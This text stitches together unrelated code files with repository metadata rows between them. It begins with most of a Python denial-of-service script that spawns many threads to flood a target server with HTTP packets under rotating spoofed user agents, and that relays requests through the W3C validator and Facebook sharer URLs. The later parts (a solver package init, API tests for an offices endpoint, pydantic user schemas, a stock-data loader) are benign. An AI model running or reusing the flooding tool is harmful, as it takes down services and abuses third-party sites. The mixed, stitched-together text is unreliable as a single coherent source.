uagent.append('YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
uagent.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
uagent.append('AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)')
uagent.append('Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)')
uagent.append('Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57')
uagent.append('Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
uagent.append('Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0')
uagent.append('Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g')
uagent.append('Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125')
uagent.append('Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)')
uagent.append('Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)')
uagent.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
uagent.append('Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)')
uagent.append('Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)')
return(uagent)
def my_uagent():
global uagent
uagent=[]
uagent.append("http://validator.w3.org/check?uri=")
uagent.append("http://www.facebook.com/sharer/sharer.php?u=")
return(uagent)
def bot_hammering(url):
try:
while True:
req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
print("\033[94mbot is hammering...\033[0m")
time.sleep(.1)
except:
time.sleep(.1)
def down_it(item):
try:
while True:
packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
if s.sendto( packet, (host, int(port)) ):
s.shutdown(1)
print ("\033[92m",time.ctime(time.time()),"\033[0m \033[94m <--packet sent! hammering--> \033[0m")
else:
s.shutdown(1)
print("\033[91mshut<->down\033[0m")
time.sleep(.1)
except socket.error as e:
print("\033[91mno connection! server maybe down\033[0m")
#print("\033[91m",e,"\033[0m")
time.sleep(.1)
def dos():
while True:
item = q.get()
down_it(item)
q.task_done()
def dos2():
while True:
item=w.get()
bot_hammering(random.choice(uagent)+"http://"+host)
w.task_done()
def usage():
print (''' \033[92m blyat Dos Script v.1 http://www.canyalcin.com/
It is the end user's responsibility to obey all applicable laws.
It is just for server testing script. Your ip is visible. \n
usage : python3 dos.py [-s] [-p] [-t]
-h : help
-s : server ip
-p : port default 80
-t : turbo default 135 \033[0m''')
sys.exit()
def get_parameters():
global host
global port
global thr
global item
optp = OptionParser(add_help_option=False,epilog="Hammers")
optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)
optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")
optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")
optp.add_option("-h","--help",dest="help",action='store_true',help="help you")
opts, args = optp.parse_args()
logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
if opts.help:
usage()
if opts.host is not None:
host = opts.host
else:
usage()
if opts.port is None:
port = 80
else:
port = opts.port
if opts.turbo is None:
thr = 135
else:
thr = opts.turbo
# reading headers
global data
headers = open("headers.txt", "r")
data = headers.read()
headers.close()
#task queue are q,w
q = Queue()
w = Queue()
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
get_parameters()
print("\033[92m",host," port: ",str(port)," turbo: ",str(thr),"\033[0m")
print("\033[94mPlease wait...\033[0m")
user_agent()
my_uagent()
time.sleep(5)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
s.settimeout(1)
except socket.error as e:
print("\033[91mcheck server ip and port\033[0m")
usage()
while True:
for i in range(int(thr)):
t = threading.Thread(target=dos)
t.daemon = True # if thread is exist, it dies
t.start()
t2 = threading.Thread(target=dos2)
t2.daemon = True # if thread is exist, it dies
t2.start()
start = time.time()
#tasking
item = 0
while True:
if (item>1800): # for no memory crash
item=0
time.sleep(.1)
item = item + 1
q.put(item)
w.put(item)
q.join()
w.join()
| 92.153846 | 258 | 0.696365 | 12,637 | 63,494 | 3.489119 | 0.040516 | 0.14751 | 0.196067 | 0.113399 | 0.951828 | 0.948471 | 0.947088 | 0.946952 | 0.944162 | 0.944162 | 0 | 0.164475 | 0.107553 | 63,494 | 688 | 259 | 92.287791 | 0.613642 | 0.002299 | 0 | 0.858647 | 0 | 0.717293 | 0.796735 | 0.029933 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01203 | false | 0 | 0.004511 | 0 | 0.016541 | 0.01203 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
0339e58ca59329200d57e1e3c5205f42b1463840 | 346 | py | Python | __init__.py | jainajinkya/snopt-python | 832a12c2422d23bbd7d3a476a3a3ae50ac7fc84f | [
"MIT"
] | 34 | 2015-02-10T17:37:49.000Z | 2022-03-07T23:07:07.000Z | __init__.py | jainajinkya/snopt-python | 832a12c2422d23bbd7d3a476a3a3ae50ac7fc84f | [
"MIT"
] | 11 | 2016-01-21T16:20:57.000Z | 2019-09-25T22:57:00.000Z | __init__.py | jainajinkya/snopt-python | 832a12c2422d23bbd7d3a476a3a3ae50ac7fc84f | [
"MIT"
] | 15 | 2016-07-19T10:22:20.000Z | 2022-01-13T06:53:40.000Z | #!/usr/bin/env python
__all__ = [ 'snopta', 'snoptb', 'snoptc', 'sqopt',
'dnopt', 'dqopt',
'SNOPT_options', 'DNOPT_options',
'SNOPT_solution', 'DNOPT_solution' ]
from .solvers import (
snopta, snoptb, snoptc, sqopt,
dnopt, dqopt,
SNOPT_options, DNOPT_options,
SNOPT_solution, DNOPT_solution)
| 26.615385 | 50 | 0.615607 | 36 | 346 | 5.583333 | 0.472222 | 0.119403 | 0.179104 | 0.228856 | 0.825871 | 0.825871 | 0.825871 | 0.825871 | 0.825871 | 0.825871 | 0 | 0 | 0.242775 | 346 | 12 | 51 | 28.833333 | 0.767176 | 0.057803 | 0 | 0 | 0 | 0 | 0.267692 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cef29df4fd6189e3189a1a056ffe885363fd8a63 | 13,140 | py | Python | app/tests/v1/test_offices.py | luqee/politico-api | f388f830efc3ecae7aeb9b3bd794135dd69731f7 | [
"MIT"
] | null | null | null | app/tests/v1/test_offices.py | luqee/politico-api | f388f830efc3ecae7aeb9b3bd794135dd69731f7 | [
"MIT"
] | null | null | null | app/tests/v1/test_offices.py | luqee/politico-api | f388f830efc3ecae7aeb9b3bd794135dd69731f7 | [
"MIT"
] | null | null | null | from app.tests.v1 import utils
TEST_UTILS = utils.Utils()
def test_create_office(client):
    ''' Test create office '''
    TEST_UTILS.register_user(client, 'admin')
    login_res = TEST_UTILS.login_user(client, 'admin')
    headers = {
        'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
    }
    response = client.post('api/v1/offices', json=TEST_UTILS.OFFICES[0], headers=headers)
    json_data = response.get_json()
    assert response.status_code == 201
    assert isinstance(json_data['data'], list)
def test_non_admin_create_office(client):
    ''' Test create office by non admin '''
    TEST_UTILS.register_user(client, 'user')
    login_res = TEST_UTILS.login_user(client, 'user')
    headers = {
        'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
    }
    response = client.post('api/v1/offices', json=TEST_UTILS.OFFICES[0], headers=headers)
    json_data = response.get_json()
    assert response.status_code == 403
    assert json_data['status'] == 403
    assert isinstance(json_data['error'], str)
    assert json_data['error'] == 'You need to be an admin to create an office'
def test_create_duplicate_office(client):
    ''' Test cannot create duplicate office '''
    TEST_UTILS.register_user(client, 'admin')
    login_res = TEST_UTILS.login_user(client, 'admin')
    headers = {
        'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
    }
    client.post('api/v1/offices', json=TEST_UTILS.OFFICES[0], headers=headers)
    response = client.post('api/v1/offices', json=TEST_UTILS.OFFICES[0], headers=headers)
    json_data = response.get_json()
    assert response.status_code == 409
    assert json_data['status'] == 409
    assert isinstance(json_data['error'], str)
    assert json_data['error'] == 'Office exists'
def test_create_office_no_payload(client):
    ''' Test office cannot be created with no payload '''
    TEST_UTILS.register_user(client, 'admin')
    login_res = TEST_UTILS.login_user(client, 'admin')
    headers = {
        'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
    }
    response = client.post('api/v1/offices', headers=headers)
    json_data = response.get_json()
    assert response.status_code == 400
    assert json_data['status'] == 400
    assert isinstance(json_data['error'], str)
    assert json_data['error'] == 'Provide name, office_type, and description as json'
def test_create_office_empty_payload(client):
    ''' Test office cannot be created with empty payload '''
    TEST_UTILS.register_user(client, 'admin')
    login_res = TEST_UTILS.login_user(client, 'admin')
    headers = {
        'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
    }
    data = {
    }
    response = client.post('api/v1/offices', json=data, headers=headers)
    json_data = response.get_json()
    assert response.status_code == 400
    assert json_data['status'] == 400
    assert isinstance(json_data['error'], str)
    assert json_data['error'] == 'Provide name, office_type, and description as json'
def test_create_office_no_name(client):
    ''' Test office cannot be created with no name '''
    TEST_UTILS.register_user(client, 'admin')
    login_res = TEST_UTILS.login_user(client, 'admin')
    headers = {
        'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
    }
    data = {
        'name': '',
        'office_type': TEST_UTILS.OFFICES[0]['office_type'],
        'description': TEST_UTILS.OFFICES[0]['description']
    }
    response = client.post('api/v1/offices', json=data, headers=headers)
    json_data = response.get_json()
    assert response.status_code == 400
    assert json_data['status'] == 400
    assert isinstance(json_data['error'], str)
    assert json_data['error'] == 'Please provide the name'
def test_create_office_name_spaces(client):
    ''' Test office cannot be created with space name '''
    TEST_UTILS.register_user(client, 'admin')
    login_res = TEST_UTILS.login_user(client, 'admin')
    headers = {
        'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
    }
    data = {
        'name': ' ',
        'office_type': TEST_UTILS.OFFICES[0]['office_type'],
        'description': TEST_UTILS.OFFICES[0]['description']
    }
    response = client.post('api/v1/offices', json=data, headers=headers)
    json_data = response.get_json()
    assert response.status_code == 400
    assert json_data['status'] == 400
    assert isinstance(json_data['error'], str)
    assert json_data['error'] == 'Please provide a valid name'
def test_create_office_short_name(client):
    ''' Test office cannot be created with short name '''
    TEST_UTILS.register_user(client, 'admin')
    login_res = TEST_UTILS.login_user(client, 'admin')
    headers = {
        'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
    }
    data = {
        'name': 'we',
        'office_type': TEST_UTILS.OFFICES[0]['office_type'],
        'description': TEST_UTILS.OFFICES[0]['description']
    }
    response = client.post('api/v1/offices', json=data, headers=headers)
    json_data = response.get_json()
    assert response.status_code == 400
    assert json_data['status'] == 400
    assert isinstance(json_data['error'], str)
    assert json_data['error'] == 'The name provided is too short'
def test_create_office_long_name(client):
''' Test office cannot be created with long name '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
data = {
'name': 'dilgjdigiceergeruguduergruega',
'office_type': TEST_UTILS.OFFICES[0]['office_type'],
'description': TEST_UTILS.OFFICES[0]['description']
}
response = client.post('api/v1/offices', json=data, headers=headers)
json_data = response.get_json()
assert response.status_code == 400
assert json_data['status'] == 400
assert isinstance(json_data['error'], str)
assert json_data['error'] == 'The name provided is too long'
def test_create_office_invalid_type(client):
''' Test office cannot be created with invalid office_type '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
data = {
'name': TEST_UTILS.OFFICES[0]['name'],
'office_type': 'notype',
'description': TEST_UTILS.OFFICES[0]['description']
}
response = client.post('api/v1/offices', json=data, headers=headers)
json_data = response.get_json()
assert response.status_code == 400
assert json_data['status'] == 400
assert isinstance(json_data['error'], str)
assert json_data['error'] == 'The office_type provided is invalid'
def test_get_office(client):
''' Test get single office '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
TEST_UTILS.create_office(client, TEST_UTILS.OFFICES[1], headers)
response = client.get('api/v1/offices/1')
json_data = response.get_json()
assert response.status_code == 200
assert isinstance(json_data['data'], list)
def test_get_non_existing_office(client):
    ''' Test get a non-existing office '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
TEST_UTILS.create_office(client, TEST_UTILS.OFFICES[1], headers)
response = client.get('api/v1/offices/13')
json_data = response.get_json()
assert response.status_code == 404
assert json_data['status'] == 404
assert isinstance(json_data['error'], str)
assert json_data['error'] == 'Office not found'
def test_get_offices(client):
''' Test get all offices '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
TEST_UTILS.create_offices(client, headers)
response = client.get('api/v1/offices')
json_data = response.get_json()
assert response.status_code == 200
assert isinstance(json_data['data'], list)
def test_update_office(client):
''' Test update single office '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
TEST_UTILS.create_office(client, TEST_UTILS.OFFICES[1], headers)
data = {
'name': 'Prime',
'office_type': 'State',
'description': 'Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitatio'
}
response = client.patch('api/v1/offices/1', json=data, headers=headers)
json_data = response.get_json()
assert response.status_code == 200
assert isinstance(json_data['data'], list)
def test_update_office_empty_payload(client):
''' Test update office with empty payload '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
TEST_UTILS.create_office(client, TEST_UTILS.OFFICES[1], headers)
data = {
}
response = client.patch('api/v1/offices/1', json=data, headers=headers)
json_data = response.get_json()
assert response.status_code == 400
assert json_data['status'] == 400
assert isinstance(json_data['error'], str)
assert json_data['error'] == 'Provide name, office_type, and description as json'
def test_update_office_no_payload(client):
''' Test update office with no payload '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
TEST_UTILS.create_office(client, TEST_UTILS.OFFICES[1], headers)
response = client.patch('api/v1/offices/1', headers=headers)
json_data = response.get_json()
assert response.status_code == 400
assert json_data['status'] == 400
assert isinstance(json_data['error'], str)
assert json_data['error'] == 'Provide name, office_type, and description as json'
def test_update_non_existing_office(client):
    ''' Test update a non-existing office '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
data = {
'name': 'Prime',
'office_type': 'State',
'description': 'Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitatio'
}
TEST_UTILS.create_office(client, TEST_UTILS.OFFICES[1], headers)
response = client.patch('api/v1/offices/12', json=data, headers=headers)
json_data = response.get_json()
assert response.status_code == 404
assert json_data['status'] == 404
assert isinstance(json_data['error'], str)
assert json_data['error'] == 'Office not found'
def test_delete_office(client):
''' Test delete office '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
TEST_UTILS.create_office(client, TEST_UTILS.OFFICES[1], headers)
response = client.delete('api/v1/offices/1', headers=headers)
json_data = response.get_json()
assert response.status_code == 202
assert isinstance(json_data['data'], list)
assert json_data['data'][0]['message'] == 'Office deleted successfully'
def test_delete_non_existing_office(client):
    ''' Test delete a non-existing office '''
TEST_UTILS.register_user(client, 'admin')
login_res = TEST_UTILS.login_user(client, 'admin')
headers = {
'Authorization': 'Bearer {0}'.format(login_res.get_json()['data'][0]['auth_token'])
}
TEST_UTILS.create_office(client, TEST_UTILS.OFFICES[1], headers)
response = client.delete('api/v1/offices/9', headers=headers)
json_data = response.get_json()
assert response.status_code == 404
assert json_data['status'] == 404
assert isinstance(json_data['error'], str)
assert json_data['error'] == 'Office not found'
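Every test above rebuilds the same `Authorization` header inline from the login response. A small helper (hypothetical, not part of the original suite) would remove that repetition; tests would then call `bearer_headers(...)` instead of formatting the dict by hand:

```python
def bearer_headers(token):
    """Build the Bearer Authorization header used throughout these tests."""
    return {'Authorization': 'Bearer {0}'.format(token)}

# In a test, after logging in:
# headers = bearer_headers(login_res.get_json()['data'][0]['auth_token'])
headers = bearer_headers('abc123')
```

This could equally be wrapped in a pytest fixture so each test receives ready-made admin headers.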
# === pipeline/schemas/user.py (mystic-ai/pipeline, Apache-2.0) ===
from typing import List, Optional
from pydantic import validator
from .base import AvatarHolder, BaseModel, Patchable
from .token import TokenGet
from .validators import valid_email, valid_password, valid_username
class UserBase(AvatarHolder):
email: str
username: str
firstname: Optional[str]
lastname: Optional[str]
company: Optional[str]
job_title: Optional[str]
class UserGet(UserBase):
id: str
oauth_provider: Optional[str]
verified: Optional[bool]
subscribed: Optional[bool]
onboarded: Optional[bool]
class UserGetDetailed(UserGet):
tokens: List[TokenGet] = []
class UserGetEnriched(UserGetDetailed):
base_token: TokenGet
class UserPatch(Patchable, AvatarHolder):
firstname: Optional[str]
lastname: Optional[str]
company: Optional[str]
job_title: Optional[str]
subscribed: Optional[bool]
onboarded: Optional[bool]
class UserUsernamePatch(Patchable):
username: str
@validator("username")
def validate_username(cls, value):
if not valid_username(value):
raise ValueError(
(
"must contain between 3-24 characters, only alphanumerics, "
"hyphens and underscores."
)
)
return value
class UserEmailPatch(Patchable):
email: str
@validator("email")
def validate_email(cls, value):
lowered_value = value.lower()
if not valid_email(lowered_value):
raise ValueError("doesn't match standard email format")
return lowered_value
class UserPasswordPatch(Patchable):
old_password: str
password: str
@validator("password")
def validate_password(cls, value):
if not valid_password(value):
raise ValueError(
(
"must contain at least 8 characters, "
"one uppercase letter and one number."
)
)
return value
class UserPasswordResetPatch(Patchable):
password: str
@validator("password")
def validate_password(cls, value):
if not valid_password(value):
raise ValueError(
(
"must contain at least 8 characters, "
"one uppercase letter and one number."
)
)
return value
class UserLogin(BaseModel):
email: str
password: str
@validator("email")
def validate_email(cls, value):
lowered_value = value.lower()
if not valid_email(lowered_value):
raise ValueError("doesn't match standard email format")
return lowered_value
class UserOAuthLogin(BaseModel):
email: str
oauth_id: str
oauth_provider: str
# If present we check if the newly created User has a pending invite to
# join an Organisation and auto-join them if so
organisation_member_invite_id: Optional[str]
# If present we check if the newly created User has a created friend invite
# and update status of invite accordingly
friend_invite_id: Optional[str]
class UserCreate(UserBase):
password: str
username: Optional[str]
account_type: Optional[str]
# If present we check if the newly created User has a pending invite to
# join an Organisation and auto-join them if so
organisation_member_invite_id: Optional[str]
# If present we check if the newly created User has a created friend invite
# and update status of invite accordingly
friend_invite_id: Optional[str]
@validator("email")
def validate_email(cls, value):
lowered_value = value.lower()
if not valid_email(lowered_value):
raise ValueError("doesn't match standard email format")
return lowered_value
@validator("password")
def validate_password(cls, value):
if not valid_password(value):
raise ValueError(
(
"must contain at least 8 characters, "
"one uppercase letter and one number."
)
)
return value
@validator("username")
def validate_username(cls, value):
if not valid_username(value):
raise ValueError(
(
"must contain between 3-24 characters, "
"only alphanumerics, hyphens and underscores."
)
)
return value
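The `valid_email`, `valid_password`, and `valid_username` helpers are imported from `.validators` and are not shown in this module. A minimal sketch consistent with the error messages above — these regexes are assumptions for illustration, not the library's actual implementation — might look like:

```python
import re

def valid_username(value):
    # 3-24 characters: alphanumerics, hyphens and underscores only (assumed)
    return re.fullmatch(r'[A-Za-z0-9_-]{3,24}', value) is not None

def valid_email(value):
    # loose "standard email format" check (assumed)
    return re.fullmatch(r'[^@\s]+@[^@\s]+\.[^@\s]+', value) is not None

def valid_password(value):
    # at least 8 characters, one uppercase letter and one number (assumed)
    return (len(value) >= 8
            and re.search(r'[A-Z]', value) is not None
            and re.search(r'[0-9]', value) is not None)
```

Each pydantic `@validator` above simply calls one of these predicates and raises `ValueError` with the matching message when it returns `False`.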
# === stock/data.py (paul-hyun/sem_20201203, MIT) ===
# -*- coding: utf-8 -*-
import os
import numpy as np
import pandas as pd
from tqdm import tqdm, trange
# https://mkjjo.github.io/python/2019/01/10/scaler.html
class MinMaxScaler():
def __init__(self, min_val, max_val):
assert (max_val > min_val)
self.min_val = min_val
self.max_val = max_val
def scale_value(self, val):
return (val - self.min_val) / (self.max_val - self.min_val)
def inv_scale_value(self, scaled_val):
return self.min_val + scaled_val * (self.max_val - self.min_val)
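A quick round-trip check of the two formulas in `MinMaxScaler` above, written with plain functions so it stands alone (the values 1000.0/2000.0 are arbitrary):

```python
min_val, max_val = 1000.0, 2000.0

def scale(v):
    # (v - min) / (max - min), as in MinMaxScaler.scale_value
    return (v - min_val) / (max_val - min_val)

def inv_scale(s):
    # min + s * (max - min), as in MinMaxScaler.inv_scale_value
    return min_val + s * (max_val - min_val)
```

Scaling maps the range onto [0, 1], and `inv_scale(scale(v))` recovers `v` up to floating-point rounding.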
def read_marcap(start, end, codes, marcap_data):
dfs = []
for year in range(start.year, end.year + 1):
csv_file = os.path.join(marcap_data, f'marcap-{year}.csv.gz')
df = pd.read_csv(csv_file, dtype={'Code': str})
dfs.append(df)
    # concatenate the per-year frames
    df_all = pd.concat(dfs)
    # convert the string column to datetime
    df_all['Date'] = pd.to_datetime(df_all['Date'])
    # keep only the requested codes
    df_all = df_all[df_all['Code'].isin(codes)]
    # apply the date range
    df_all = df_all[(start <= df_all["Date"]) & (df_all["Date"] <= end)]
    # sort by date, ascending
    df_all = df_all.sort_values('Date', ascending=True)
return df_all
def load_datas(df, x_cols, y_col, train_start, train_end, test_start, test_end, n_seq):
train_inputs, train_labels = [], []
test_inputs, test_labels = [], []
for i in trange(0, len(df) - n_seq):
x = df.iloc[i:i + n_seq][x_cols].to_numpy()
y = df.iloc[i + n_seq][y_col]
date = df.iloc[i + n_seq]['Date']
if train_start <= date <= train_end:
train_inputs.append(x)
train_labels.append(y)
elif test_start <= date <= test_end:
test_inputs.append(x)
test_labels.append(y)
else:
print(f'discard {date}')
train_inputs = np.array(train_inputs)
train_labels = np.array(train_labels)
test_inputs = np.array(test_inputs)
test_labels = np.array(test_labels)
return train_inputs, train_labels, test_inputs, test_labels
